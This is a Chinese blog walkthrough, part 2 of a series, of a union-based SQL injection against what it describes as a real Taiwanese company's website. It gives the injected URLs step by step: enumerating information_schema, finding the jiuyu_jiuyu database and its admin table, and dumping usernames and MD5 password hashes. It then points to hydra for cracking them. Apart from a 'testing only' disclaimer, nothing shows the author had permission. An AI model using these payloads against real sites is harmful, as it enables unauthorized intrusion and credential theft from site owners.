Web渗/透/测试实战(2)—获取网站后台登录用户名密码

接上一篇内容:

渗/透/测/试实战(1)—成功渗/透台湾某净化设备公司官网

目录

写在前面

声明:只做测试,发现对方的漏洞,并不进行破坏性操作

信息汇总

漏洞汇总:

数据库信息:

利用information_schema库:

1、 数据库分析

①获取该用户权限下,有多少个数据库

②下一步获取这两个数据库的名字

2、表结构分析

①获取数据库多少表

②获取表名称

3、用户名密码获取

首先,我们要先拿到admin表的表结构,即包含的字段名

获取4个字段的名称

获取登录名/密码



写在前面

作为一个防御型白帽黑/客

你一定要知道黑/客的进攻套路

才能有相应的防御措施

声明:只做测试,发现对方的漏洞,并不进行破坏性操作





信息汇总


漏洞汇总:


1、存在SQL注入漏洞2、SQL注入查询长度为9个字段,即 union select 1,2,3,4,5,6,7,8,93、网站无错误回显,SQL执行错误显示空白页面


数据库信息:

1、数据库版本:mysql 5.7.312、当前数据库:jiuyu_jiuyu3、当前登录用户:jiuyu@localhost4、注入点:  http://www.xxx.com.tw/page.php?id=133     union   select 1,2,version(),current_user(),5,6,7,8,9


利用information_schema库:


在mysql数据库中

当前登录用户下,会有一个information_schema数据库

这个数据库里包含了当前用户权限下

所有database、table、column、privilege等等的汇总信息

在注入过程中,可以充分利用。



然后我们根据当前获得的信息,进行进一步的***


1、 数据库分析


①获取该用户权限下,有多少个数据库

#拼接注入连接http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,count(distinct(table_schema)),4,5,6,7,8,9 FROM information_schema.tables#通过information_schema数据库获取数据库相关信息


通过注入SQL语句

得到了数据库的数量 2 个



②下一步获取这两个数据库的名字


#通过使用limit 可以逐条返回表数据http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,table_schema,4,5,6,7,8,9 FROM information_schema.tableslimit 2


通过添加两个limit,限定两条返回值

得到了仅有的两个数据库名称

information_schema 和 jiuyu_jiuyu

information_schema是默认的信息汇总表

所有,有用的就是jiuyu_jiuyu这个库




2、表结构分析

得到了目标数据库:jiuyu_jiuyu

下面对该数据库进行分析


①获取数据库多少表


http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,count(distinct(table_name)),4,5,6,7,8,9 FROM information_schema.tableswhere table_schema='jiuyu_jiuyu'#返回值为 4个表


②获取表名称


#只有4个表,使用limit 逐条获取表名http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,table_name,4,5,6,7,8,9 FROM information_schema.tableswhere table_schema='jiuyu_jiuyu'limit 1

依次得到四个表


adminsmallclasswenzhangneirong


    


emmm 经过认真分析

不难发现

admin表会有一些重要信息

其他的wenzhang、neirong之类的应该是一些新闻信息

下面 我们就对admin表进行数据获取


3、用户名密码获取


首先,我们要先拿到admin表的表结构,即包含的字段名


#获取admin表的字段数量http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,count(1),4,5,6,7,8,9 FROM information_schema.columnswhere table_name='admin'#包含四个字段



获取4个字段的名称


#获取admin表字段名称http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,column_name,4,5,6,7,8,9 FROM information_schema.columnswhere table_name='admin' limit 1




通过limit 逐条获取admin表的字段值    id    username    password    quanxian



获取登录名/密码

是不是有点紧张

用户名密码什么的




#获取admin表的数据值http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,username,password,5,6,7,8,9 FROM jiuyu_jiuyu.admin



成功获取用户名密码返回值。

当然,密码是md5加密过的

如果想破解出明文

可以使用之前介绍过的密码爆破工具hydra进行爆破


Kali***测试工具库(三)hydra——密码暴力破解工具


好了,点到为止

只做安全测试

发现漏洞

不要做违法乱纪的事情哦。


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章